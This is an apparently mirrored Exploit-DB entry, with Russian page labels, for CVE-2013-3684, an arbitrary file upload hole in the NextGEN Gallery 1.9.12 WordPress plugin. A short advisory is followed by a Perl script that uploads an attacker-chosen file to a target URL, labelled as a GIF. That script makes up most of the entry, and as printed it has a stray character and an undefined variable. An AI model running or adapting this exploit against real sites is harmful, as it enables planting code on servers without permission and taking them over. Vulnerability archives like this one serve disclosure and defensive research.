- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 38585
- Проверка EDB
-
- Пройдено
- Автор
- MARCOS GARCIA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2013-3684
- Дата публикации
- 2013-06-12
WordPress Plugin NextGEN Gallery - 'upload.php' Arbitrary File Upload
Код:
source: https://www.securityfocus.com/bid/60533/info
The NextGEN Gallery plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
NextGEN Gallery 1.9.12 is vulnerable; other versions may also be affected.
#! /usr/bin/perl
use LWP;
use HTTP::Request::Common;
my ($url, $file) = @ARGV;
my $ua = LWP::UserAgent->new();
my $req = POST $url,
Content_Type => 'form-data',
Content => [.
name => $name,
galleryselect => 1, # Gallery ID, should exist
Filedata => [ "$file", "file.gif", Content_Type =>
'image/gif' ]
];
my $res = $ua->request( $req );
if( $res->is_success ) {
print $res->content;
} else {
print $res->status_line, "\n";
}
- Источник
- www.exploit-db.com